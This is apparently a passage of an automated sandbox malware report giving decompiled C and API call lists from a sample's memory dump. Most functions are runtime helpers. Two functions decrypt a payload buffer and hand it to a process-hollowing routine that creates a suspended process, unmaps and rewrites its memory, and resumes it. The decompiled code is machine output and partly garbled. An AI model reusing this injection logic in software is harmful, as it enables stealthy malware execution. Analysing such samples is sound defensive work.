    										L17:
    										E00408974(__ebp) = E004089A0(__ebp);
    										 *(__ebp - 0xc) =  *(__ebp - 0xc) - 1;
    										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
    										__eflags =  *(__ebp - 0xc) - 0xffffffffffffffff;
    										if(__eflags < 0) {
    											__eax =  *(__ebp + 8);
    											__eax =  *(__ebp - 0x10) & 0x0000ffff;
    											__edx =  *(__ebp - 0xc);
    											__eax = E00408928( *(__ebp - 0x10) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										} else {
    											if(__eflags == 0) {
    												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
    												__eax = 0x45469c[ *(__ebp - 0x10) & 0x0000ffff];
    												__eax = E00408908(0x45469c[ *(__ebp - 0x10) & 0x0000ffff], __ecx,  *(__ebp + 8));
    											} else {
    												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
    												__eax =  *(0x4546cc + ( *(__ebp - 0x10) & 0x0000ffff) * 4);
    												__eax = E00408908( *(0x4546cc + ( *(__ebp - 0x10) & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
    											}
    										}
    										goto L109;
    									case 5:
    										L23:
    										E00408974(__ebp) =  *(__ebp - 0xc);
    										__eax =  *(__ebp - 0xc) - 1;
    										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
    										__eflags = __eax;
    										if(__eflags < 0) {
    											E004089A0(__ebp) =  *(__ebp + 8);
    											__eax =  *(__ebp - 0x12) & 0x0000ffff;
    											__edx =  *(__ebp - 0xc);
    											__eax = E00408928( *(__ebp - 0x12) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										} else {
    											if(__eflags == 0) {
    												E00408888(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
    												__eax =  *(0x4546fc + (__ax & 0x0000ffff) * 4);
    												__eax = E00408908( *(0x4546fc + (__ax & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
    											} else {
    												__eax = __eax - 1;
    												__eflags = __eax;
    												if(__eflags == 0) {
    													E00408888(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
    													__eax =  *(0x454718 + (__ax & 0x0000ffff) * 4);
    													__eax = E00408908( *(0x454718 + (__ax & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
    												} else {
    													__eax = __eax - 1;
    													__eflags = __eax;
    													if(__eax == 0) {
    														__eax =  *(__ebp + 8);
    														__eax =  *0x454684; // 0x0
    														__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    													} else {
    														__eax =  *(__ebp + 8);
    														__eax =  *0x454688; // 0x0
    														__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    													}
    												}
    											}
    										}
    										goto L109;
    									case 6:
    										L33:
    										__eax = E00408974(__ebp);
    										__eax = E004089D8(__ebp);
    										 *(__ebp - 0x1f) = 0;
    										__esi =  *(__ebp - 4);
    										while(1) {
    											L52:
    											__al =  *__esi;
    											__eflags =  *__esi;
    											if( *__esi == 0) {
    												break;
    											}
    											L34:
    											__eax = __eax & 0x000000ff;
    											__eflags = __eax;
    											asm("bt [0x419108], eax");
    											if(__eax >= 0) {
    												L36:
    												__eax = 0;
    												__al =  *__esi;
    												__eflags = 0 - 0x48;
    												if(0 > 0x48) {
    													L42:
    													__eax = 0xffffffffffffff9f;
    													__eflags = 0xffffffffffffff9f;
    													if(0xffffffffffffff9f == 0) {
    														L45:
    														__eflags =  *(__ebp - 0x1f);
    														if( *(__ebp - 0x1f) != 0) {
    															L51:
    															__esi = __esi + 1;
    															__eflags = __esi;
    															continue;
    														}
    														L46:
    														__edx = 0x409418;
    														__ecx = 5;
    														__eax = __esi;
    														__eax = E004077C0(__esi, 5, 0x409418);
    														__eflags = __eax;
    														if(__eax == 0) {
    															L49:
    															 *((char*)(__ebp - 0x1e)) = 1;
    															break;
    														}
    														L47:
    														__edx = 0x409420;
    														__ecx = 3;
    														__eax = __esi;
    														__eax = E004077C0(__esi, 3, 0x409420);
    														__eflags = __eax;
    														if(__eax == 0) {
    															goto L49;
    														}
    														L48:
    														__edx = 0x409424;
    														__ecx = 4;
    														__eax = __esi;
    														__eax = E004077C0(__esi, 4, 0x409424);
    														__eflags = __eax;
    														if(__eax != 0) {
    															break;
    														}
    														goto L49;
    													}
    													L43:
    													__eax = 0xffffffffffffff98;
    													__eflags = 0xffffffffffffff9f;
    													if(0xffffffffffffff9f == 0) {
    														break;
    													}
    													L44:
    													goto L51;
    												}
    												L37:
    												if(0 == 0x48) {
    													break;
    												}
    												L38:
    												__eax = 0xffffffffffffffde;
    												__eflags = 0xffffffffffffffde;
    												if(0xffffffffffffffde == 0) {
    													L50:
    													__al =  *(__ebp - 0x1f);
    													__al =  *(__ebp - 0x1f) ^ 0x00000001;
    													__eflags = __al;
    													 *(__ebp - 0x1f) = __al;
    													goto L51;
    												}
    												L39:
    												__eax = 0xffffffffffffffd9;
    												__eflags = 0xffffffffffffffde;
    												if(0xffffffffffffffde == 0) {
    													goto L50;
    												}
    												L40:
    												__eax = 0xffffffffffffffbf;
    												__eflags = 0xffffffffffffffde;
    												if(0xffffffffffffffde == 0) {
    													goto L45;
    												}
    												L41:
    												goto L51;
    											} else {
    												__eax = __esi;
    												__eax = E0040B044(__esi);
    												__esi = __eax;
    												continue;
    											}
    										}
    										L53:
    										__ax =  *((intOrPtr*)(__ebp - 0x16));
    										__eflags =  *((char*)(__ebp - 0x1e));
    										if( *((char*)(__ebp - 0x1e)) != 0) {
    											__eflags = __ax;
    											if(__ax != 0) {
    												__eflags = __ax - 0xc;
    												if(__ax > 0xc) {
    													__ax = __ax - 0xc;
    													__eflags = __ax;
    												}
    											} else {
    												__ax = 0xc;
    											}
    										}
    										__eflags =  *(__ebp - 0xc) - 2;
    										if( *(__ebp - 0xc) > 2) {
    											 *(__ebp - 0xc) = 2;
    										}
    										__edx =  *(__ebp + 8);
    										__eax = __ax & 0x0000ffff;
    										__edx =  *(__ebp - 0xc);
    										__eax = E00408928(__ax & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										goto L109;
    									case 7:
    										L61:
    										E00408974(__ebp) = E004089D8(__ebp);
    										__eflags =  *(__ebp - 0xc) - 2;
    										if( *(__ebp - 0xc) > 2) {
    											 *(__ebp - 0xc) = 2;
    										}
    										__eax =  *(__ebp + 8);
    										__eax =  *(__ebp - 0x18) & 0x0000ffff;
    										__edx =  *(__ebp - 0xc);
    										__eax = E00408928( *(__ebp - 0x18) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										goto L109;
    									case 8:
    										L64:
    										E00408974(__ebp) = E004089D8(__ebp);
    										__eflags =  *(__ebp - 0xc) - 2;
    										if( *(__ebp - 0xc) > 2) {
    											 *(__ebp - 0xc) = 2;
    										}
    										__eax =  *(__ebp + 8);
    										__eax =  *(__ebp - 0x1a) & 0x0000ffff;
    										__edx =  *(__ebp - 0xc);
    										__eax = E00408928( *(__ebp - 0x1a) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										goto L109;
    									case 9:
    										L67:
    										__eax = E00408974(__ebp);
    										__eflags =  *(__ebp - 0xc) - 1;
    										if( *(__ebp - 0xc) != 1) {
    											__eax =  *(__ebp + 8);
    											__eax =  *0x45469c; // 0x0
    											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    										} else {
    											__eax =  *(__ebp + 8);
    											__eax =  *0x454698; // 0x0
    											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    										}
    										goto L109;
    									case 0xa:
    										L70:
    										E00408974(__ebp) = E004089D8(__ebp);
    										__eflags =  *(__ebp - 0xc) - 3;
    										if( *(__ebp - 0xc) > 3) {
    											 *(__ebp - 0xc) = 3;
    										}
    										__eax =  *(__ebp + 8);
    										__eax =  *(__ebp - 0x1c) & 0x0000ffff;
    										__edx =  *(__ebp - 0xc);
    										__eax = E00408928( *(__ebp - 0x1c) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										goto L109;
    									case 0xb:
    										goto L0;
    									case 0xc:
    										L90:
    										E00408974(__ebp) =  *(__ebp + 8);
    										__eax =  *0x454684; // 0x0
    										__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    										__eax = E004089D8(__ebp);
    										__eflags =  *((short*)(__ebp - 0x16));
    										if( *((short*)(__ebp - 0x16)) != 0) {
    											L93:
    											 *(__ebp + 8) = 0x409438;
    											__edx = 1;
    											E004088C4(1,  *(__ebp + 8)) =  *(__ebp + 8);
    											__eax =  *0x45469c; // 0x0
    											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    											goto L109;
    										}
    										L91:
    										__eflags =  *(__ebp - 0x18);
    										if( *(__ebp - 0x18) != 0) {
    											goto L93;
    										}
    										L92:
    										__eflags =  *(__ebp - 0x1a);
    										if( *(__ebp - 0x1a) == 0) {
    											goto L109;
    										}
    										goto L93;
    									case 0xd:
    										L94:
    										__eflags =  *0x454681;
    										__eflags = __eax - 0x454681;
    										 *__edi =  *__edi + __cl;
    										__eflags =  *(__ecx - 0x75000000) & __bl;
    									case 0xe:
    										L97:
    										__eflags =  *0x45468c;
    										__eflags = __eax - 0x45468c;
    										_t136 = __edi + __esi * 2 - 0x75;
    										 *_t136 =  *(__edi + __esi * 2 - 0x75) + __dh;
    										__eflags =  *_t136;
    									case 0xf:
    										L100:
    										__esi =  *(__ebp - 4);
    										while(1) {
    											L104:
    											__eax =  *(__ebp - 4);
    											__al =  *__eax;
    											__eflags = __al;
    											if(__al == 0) {
    												break;
    											}
    											L105:
    											__eflags = __al -  *((intOrPtr*)(__ebp - 5));
    											if(__al !=  *((intOrPtr*)(__ebp - 5))) {
    												L101:
    												__eax = __eax & 0x000000ff;
    												__eflags = __eax;
    												asm("bt [0x419108], eax");
    												if(__eax >= 0) {
    													_t146 = __ebp - 4;
    													 *_t146 =  *(__ebp - 4) + 1;
    													__eflags =  *_t146;
    												} else {
    													__eax =  *(__ebp - 4);
    													 *(__ebp - 4) = E0040B044( *(__ebp - 4));
    												}
    												continue;
    											}
    											break;
    										}
    										L106:
    										__eax =  *(__ebp + 8);
    										__edx =  *(__ebp - 4);
    										__edx =  *(__ebp - 4) - __esi;
    										__esi = E004088C4(__edx,  *(__ebp + 8));
    										__eax =  *(__ebp - 4);
    										__eflags =  *__eax;
    										if( *__eax != 0) {
    											 *(__ebp - 4) =  *(__ebp - 4) + 1;
    										}
    										goto L109;
    								}
    							} else {
    								__eflags = _t181 - 0x4d;
    								if(_t181 == 0x4d) {
    									__eflags = _t232 - 0x48;
    									if(_t232 == 0x48) {
    										_t181 = 0x4e;
    									}
    								}
    								L9:
    								_t232 = _t181;
    								goto L10;
    							}
    						} else {
    							E004088C4(E0040B024( *((intOrPtr*)(_t282 - 4))),  *((intOrPtr*)(_t282 + 8)));
    							 *((intOrPtr*)(_t282 - 4)) = E0040B044( *((intOrPtr*)(_t282 - 4)));
    							_t232 = 0x20;
    							continue;
    						}
    					}
    					L110:
    					 *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) - 0x108)) =  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) - 0x108)) - 1;
    					_pop(_t272);
    					 *[fs:eax] = _t272;
    					_push(E00409410);
    					return E00403EAC(_t282 - 0x28, 2);
    				}
    			}


















    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 82%
    			E0040D920(intOrPtr* __eax) {
    				char _v260;
    				char _v768;
    				char _v772;
    				intOrPtr* _v776;
    				signed short* _v780;
    				char _v784;
    				signed int _v788;
    				char _v792;
    				intOrPtr* _v796;
    				signed char _t43;
    				intOrPtr* _t60;
    				void* _t79;
    				void* _t81;
    				void* _t84;
    				void* _t85;
    				intOrPtr* _t92;
    				void* _t96;
    				char* _t97;
    				void* _t98;
    
    				_v776 = __eax;
    				if(( *(_v776 + 1) & 0x00000020) == 0) {
    					E0040D7EC(0x80070057);
    				}
    				_t43 =  *_v776;
    				if((_t43 & 0x00000fff) == 0xc) {
    					if((_t43 & 0x00000040) == 0) {
    						_v780 =  *((intOrPtr*)(_v776 + 8));
    					} else {
    						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
    					}
    					_v788 =  *_v780 & 0x0000ffff;
    					_t79 = _v788 - 1;
    					if(_t79 >= 0) {
    						_t85 = _t79 + 1;
    						_t96 = 0;
    						_t97 =  &_v772;
    						do {
    							_v796 = _t97;
    							_push(_v796 + 4);
    							_t22 = _t96 + 1; // 0x1
    							_push(_v780);
    							L0040C9FC();
    							E0040D7EC(_v780);
    							_push( &_v784);
    							_t25 = _t96 + 1; // 0x1
    							_push(_v780);
    							L0040CA04();
    							E0040D7EC(_v780);
    							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
    							_t96 = _t96 + 1;
    							_t97 = _t97 + 8;
    							_t85 = _t85 - 1;
    						} while (_t85 != 0);
    					}
    					_t81 = _v788 - 1;
    					if(_t81 >= 0) {
    						_t84 = _t81 + 1;
    						_t60 =  &_v768;
    						_t92 =  &_v260;
    						do {
    							 *_t92 =  *_t60;
    							_t92 = _t92 + 4;
    							_t60 = _t60 + 8;
    							_t84 = _t84 - 1;
    						} while (_t84 != 0);
    						do {
    							goto L12;
    						} while (E0040D8C4(_t83, _t98) != 0);
    						goto L15;
    					}
    					L12:
    					_t83 = _v788 - 1;
    					if(E0040D894(_v788 - 1, _t98) != 0) {
    						_push( &_v792);
    						_push( &_v260);
    						_push(_v780);
    						L0040CA0C();
    						E0040D7EC(_v780);
    						E0040DB18(_v792);
    					}
    				}
    				L15:
    				_push(_v776);
    				L0040C598();
    				return E0040D7EC(_v776);
    			}























    APIs
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040D9CF
    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040D9EB
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040DA62
    • VariantClear.OLEAUT32(?), ref: 0040DA8B
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040B3A0() {
    				char _v152;
    				short _v410;
    				signed short _t14;
    				signed int _t16;
    				int _t18;
    				void* _t20;
    				void* _t23;
    				int _t24;
    				int _t26;
    				signed int _t30;
    				signed int _t31;
    				signed int _t32;
    				signed int _t37;
    				int* _t39;
    				short* _t41;
    				void* _t49;
    
    				 *0x454738 = 0x409;
    				 *0x45473c = 9;
    				 *0x454740 = 1;
    				_t14 = GetThreadLocale();
    				if(_t14 != 0) {
    					 *0x454738 = _t14;
    				}
    				if(_t14 != 0) {
    					 *0x45473c = _t14 & 0x3ff;
    					 *0x454740 = (_t14 & 0x0000ffff) >> 0xa;
    				}
    				memcpy(0x419108, 0x40b4f4, 8 << 2);
    				if( *0x4190c0 != 2) {
    					_t16 = GetSystemMetrics(0x4a);
    					__eflags = _t16;
    					 *0x454745 = _t16 & 0xffffff00 | _t16 != 0x00000000;
    					_t18 = GetSystemMetrics(0x2a);
    					__eflags = _t18;
    					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
    					 *0x454744 = _t31;
    					__eflags = _t31;
    					if(__eflags != 0) {
    						return E0040B328(__eflags, _t49);
    					}
    				} else {
    					_t20 = E0040B388();
    					if(_t20 != 0) {
    						 *0x454745 = 0;
    						 *0x454744 = 0;
    						return _t20;
    					}
    					E0040B328(__eflags, _t49);
    					_t37 = 0x20;
    					_t23 = E00402C54(0x419108, 0x20, 0x40b4f4);
    					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
    					 *0x454744 = _t32;
    					__eflags = _t32;
    					if(_t32 != 0) {
    						 *0x454745 = 0;
    						return _t23;
    					}
    					_t24 = 0x80;
    					_t39 =  &_v152;
    					do {
    						 *_t39 = _t24;
    						_t24 = _t24 + 1;
    						_t39 =  &(_t39[0]);
    						__eflags = _t24 - 0x100;
    					} while (_t24 != 0x100);
    					_t26 =  *0x454738; // 0x409
    					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
    					_t18 = 0x80;
    					_t41 =  &_v410;
    					while(1) {
    						__eflags =  *_t41 - 2;
    						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
    						 *0x454745 = _t37;
    						__eflags = _t37;
    						if(_t37 != 0) {
    							goto L17;
    						}
    						_t41 = _t41 + 2;
    						_t18 = _t18 - 1;
    						__eflags = _t18;
    						if(_t18 != 0) {
    							continue;
    						} else {
    							return _t18;
    						}
    						L18:
    					}
    				}
    				L17:
    				return _t18;
    				goto L18;
    			}




















    APIs
    • GetThreadLocale.KERNEL32 ref: 0040B3CA
    • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040B494
    • GetSystemMetrics.USER32(0000004A), ref: 0040B4BF
    • GetSystemMetrics.USER32(0000002A), ref: 0040B4D0
      • Part of subcall function 0040B328: GetCPInfo.KERNEL32(00000000,?), ref: 0040B341
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040152C(void* __eax, void** __ecx, void* __edx) {
    				void* _t4;
    				void** _t9;
    				void* _t13;
    				void* _t14;
    				long _t16;
    				void* _t17;
    
    				_t9 = __ecx;
    				_t14 = __edx;
    				_t17 = __eax;
    				 *(__ecx + 4) = 0x100000;
    				_t4 = VirtualAlloc(__eax, 0x100000, 0x2000, 4);
    				_t13 = _t4;
    				 *_t9 = _t13;
    				if(_t13 == 0) {
    					_t16 = _t14 + 0x0000ffff & 0xffff0000;
    					_t9[1] = _t16;
    					_t4 = VirtualAlloc(_t17, _t16, 0x2000, 4);
    					 *_t9 = _t4;
    				}
    				if( *_t9 != 0) {
    					_t4 = E0040137C(0x4545e4, _t9);
    					if(_t4 == 0) {
    						VirtualFree( *_t9, 0, 0x8000);
    						 *_t9 = 0;
    						return 0;
    					}
    				}
    				return _t4;
    			}










    APIs
    • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 0040154A
    • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 0040156F
    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 00401595
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00405E00(void* __eax, int __ecx, long __edx) {
    				void* _t2;
    				void* _t4;
    
    				_t2 = GlobalHandle(__eax);
    				GlobalUnWire(_t2);
    				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
    				GlobalFix(_t4);
    				return _t4;
    			}






    APIs
    • GlobalHandle.KERNEL32 ref: 00405E03
    • GlobalUnWire.KERNEL32(00000000), ref: 00405E0A
    • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00405E0F
    • GlobalFix.KERNEL32(00000000), ref: 00405E15
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 72%
    			E00408B80(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
    				char _v8;
    				short _v18;
    				short _v22;
    				struct _SYSTEMTIME _v24;
    				char _v280;
    				char* _t32;
    				intOrPtr* _t49;
    				intOrPtr _t58;
    				void* _t63;
    				void* _t67;
    
    				_v8 = 0;
    				_t49 = __edx;
    				_t63 = __eax;
    				_push(_t67);
    				_push(0x408c5e);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t67 + 0xfffffeec;
    				E00403E88(__edx);
    				_v24 =  *((intOrPtr*)(_a4 - 0xe));
    				_v22 =  *((intOrPtr*)(_a4 - 0x10));
    				_v18 =  *((intOrPtr*)(_a4 - 0x12));
    				if(_t63 > 2) {
    					E00403F20( &_v8, 0x408c80);
    				} else {
    					E00403F20( &_v8, 0x408c74);
    				}
    				_t32 = E00404348(_v8);
    				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
    					E004040F8(_t49, 0x100,  &_v280);
    					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
    						E004043A8( *_t49, E00404148( *_t49) - 1, 2, _t49);
    					}
    				}
    				_pop(_t58);
    				 *[fs:eax] = _t58;
    				_push(E00408C65);
    				return E00403E88( &_v8);
    			}














    APIs
    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,00408C5E), ref: 00408C06
    • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100), ref: 00408C0C
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 50%
    			E0041844E() {
    				struct _SYSTEM_INFO _v40;
    				signed int _v44;
    				char _v48;
    				char _v52;
    				intOrPtr* _t15;
    				void* _t31;
    				signed int _t34;
    				void* _t38;
    				void* _t39;
    				void* _t45;
    				void* _t51;
    
    				_v44 = 0;
    				_v52 = 0;
    				_v48 = 0;
    				_push(_t45);
    				_push(0x418517);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t45 + 0xffffffd0;
    				GetSystemInfo( &_v40);
    				_t34 = 0;
    				_t31 = 0x39a91;
    				_t15 = 0x41944c;
    				do {
    					if(_t34 == 0x20) {
    						_t34 = 0;
    					}
    					_t5 = (_t34 & 0x000000ff) + 0x452ee0; // 0x8845645c
    					_t30 = ( *_t15 - _t34 ^  *_t5) + _t34;
    					 *_t15 = ( *_t15 - _t34 ^  *_t5) + _t34;
    					_t34 = _t34 + 1;
    					_t15 = _t15 + 1;
    					_t31 = _t31 - 1;
    				} while (_t31 != 0);
    				L5:
    				_push("h`JE");
    				_push("-t ");
    				_push(0);
    				E004070E8( &_v48, _t51, _v40.dwNumberOfProcessors >> 1);
    				_push(_v48);
    				_push(0x41853c);
    				_push( *0x454a5c);
    				E00404208();
    				_push(_v44);
    				E004029A4(0,  &_v52);
    				_pop(_t38);
    				E00417F5C(_v52, _t30, 0x41944c, _t38, _t39, _t42, _t51);
    				goto L5;
    			}















    APIs
    • GetSystemInfo.KERNEL32(?,00000000,00418517), ref: 00418475
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
      • Part of subcall function 00417F5C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F5C: GetThreadContext.KERNEL32(?,00000000), ref: 00418066
      • Part of subcall function 00417F5C: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
      • Part of subcall function 00417F5C: NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
      • Part of subcall function 00417F5C: SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
      • Part of subcall function 00417F5C: ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
      • Part of subcall function 00417F5C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
      • Part of subcall function 00417F5C: TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
      • Part of subcall function 00417F5C: CloseHandle.KERNEL32(?), ref: 004181C1
      • Part of subcall function 00417F5C: VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
      • Part of subcall function 00417F5C: TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 53%
    			E00418450() {
    				struct _SYSTEM_INFO _v40;
    				signed int _v44;
    				char _v48;
    				char _v52;
    				intOrPtr* _t15;
    				void* _t30;
    				signed int _t33;
    				void* _t37;
    				void* _t38;
    				intOrPtr _t42;
    				void* _t47;
    
    				_v44 = 0;
    				_v52 = 0;
    				_v48 = 0;
    				_push(0x418517);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t42;
    				GetSystemInfo( &_v40);
    				_t33 = 0;
    				_t30 = 0x39a91;
    				_t15 = 0x41944c;
    				do {
    					if(_t33 == 0x20) {
    						_t33 = 0;
    					}
    					_t5 = (_t33 & 0x000000ff) + 0x452ee0; // 0x8845645c
    					_t29 = ( *_t15 - _t33 ^  *_t5) + _t33;
    					 *_t15 = ( *_t15 - _t33 ^  *_t5) + _t33;
    					_t33 = _t33 + 1;
    					_t15 = _t15 + 1;
    					_t30 = _t30 - 1;
    				} while (_t30 != 0);
    				L4:
    				_push("h`JE");
    				_push("-t ");
    				_push(0);
    				E004070E8( &_v48, _t47, _v40.dwNumberOfProcessors >> 1);
    				_push(_v48);
    				_push(0x41853c);
    				_push( *0x454a5c);
    				E00404208();
    				_push(_v44);
    				E004029A4(0,  &_v52);
    				_pop(_t37);
    				E00417F5C(_v52, _t29, 0x41944c, _t37, _t38, _t40, _t47);
    				goto L4;
    			}















    APIs
    • GetSystemInfo.KERNEL32(?,00000000,00418517), ref: 00418475
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
      • Part of subcall function 00417F5C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F5C: GetThreadContext.KERNEL32(?,00000000), ref: 00418066
      • Part of subcall function 00417F5C: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
      • Part of subcall function 00417F5C: NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
      • Part of subcall function 00417F5C: SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
      • Part of subcall function 00417F5C: ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
      • Part of subcall function 00417F5C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
      • Part of subcall function 00417F5C: TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
      • Part of subcall function 00417F5C: CloseHandle.KERNEL32(?), ref: 004181C1
